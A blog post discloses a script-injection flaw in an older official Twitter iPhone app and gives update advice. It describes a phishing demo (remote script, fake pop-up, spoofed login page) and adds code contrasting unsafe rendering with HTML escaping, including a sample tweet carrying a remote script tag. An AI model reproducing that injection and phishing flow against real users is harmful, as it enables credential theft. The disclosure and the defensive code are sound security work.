If you haven’t updated the official Twitter iPhone app on your iPhone/iPod recently, you may want to do so, as I’ve found something in the app version (3.3.0) previous to the current one (3.3.1). If you’ve updated to the latest version since the 9th or so, you’re fine. This affects only the official Twitter app for iPhone/iPod, not Twitterrific or others.
I found a security hole in the 3.3.0 Twitter iPhone app! You can inject your own HTML, CSS and JavaScript into the iPhone client, and this hack leaves users wide open to phishing scams and the like.
I haven’t tested the full possibilities of this, but I imagine there are loads here! The hack I’m demoing loads JavaScript remotely (in this case ‘tweet.js’) into the view. Once it executes, it spoofs a warning pop-up; tapping either ‘Ok’ or ‘Cancel’ brings you to a new page regardless. That page can be anything, and in this case I’ve set it to look like a Twitter login page, which, upon a user entering their details, could email them back to someone via a form.
Here are the screenshots and a walkthrough:
1. Tweet containing the JavaScript to inject (the ‘<script>’ bit)

2. Initial view with scrolling warning text

3. ‘Warning’ pop-up (appears after 3.5 secs); pressing either button sends you to our phishing site, no way out (*whimper*)

4. Fake Twitter account protect page

5. Upon pressing the ‘Protect Account’ button, sends you to my site (or any site with nastier stuff, or one that could email the entered details)

What should you do?
UPDATE your Twitter app via the App Store. Should you be unable to do so, stay the hell away from any tweets that contain tags like ‘<html>’ or ‘<script>’; you’ll notice the weird link. You can see whether a tweet contains this from your main timeline view in the app.
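To make the root cause and the fix concrete, here is an added example (my own illustration, not the Twitter app’s code) of the difference between dropping raw tweet text into a web view and escaping it first, plus the kind of timeline-side check the advice above describes. It assumes the client builds an HTML fragment per tweet for a WebView; the sample tweet and the tweet.js URL are constructed.

```javascript
// Added example, not code from the Twitter app. Assumption: the client builds an
// HTML fragment for each tweet and hands it to a WebView for display.

// Constructed sample tweet in the shape the post describes: markup smuggled into the text.
const SAMPLE_TWEET = 'check this out <script src="https://example.invalid/tweet.js"></script>';

// Vulnerable pattern: raw tweet text is concatenated into markup, so any tags in the
// tweet become live elements (and scripts) inside the client's web view.
function renderTweetUnsafe(text) {
  return `<div class="tweet">${text}</div>`;
}

// Hardened pattern: escape the five HTML-significant characters before interpolation,
// so the tweet is displayed verbatim as text and never parsed as elements.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderTweetSafe(text) {
  return `<div class="tweet">${escapeHtml(text)}</div>`;
}

// Timeline-side check matching the advice above: flag tweets that carry tag-like
// markup (e.g. <html> or <script>) so they can be shown with a warning or logged.
// A bare "<" in ordinary text (e.g. "3 < 5") is not flagged.
const TAG_PATTERN = /<\s*\/?\s*[a-z][a-z0-9-]*(\s[^>]*)?>/i;
function containsMarkup(text) {
  return TAG_PATTERN.test(String(text));
}

// Quick demonstration when run directly with Node.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', renderTweetUnsafe(SAMPLE_TWEET));
  console.log('safe:  ', renderTweetSafe(SAMPLE_TWEET));
  console.log('flagged:', containsMarkup(SAMPLE_TWEET));
}
```

The escaped output is what a correctly built client would show: the tweet text appears on screen exactly as typed, with no script ever executing.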



Well at least she got 10 points…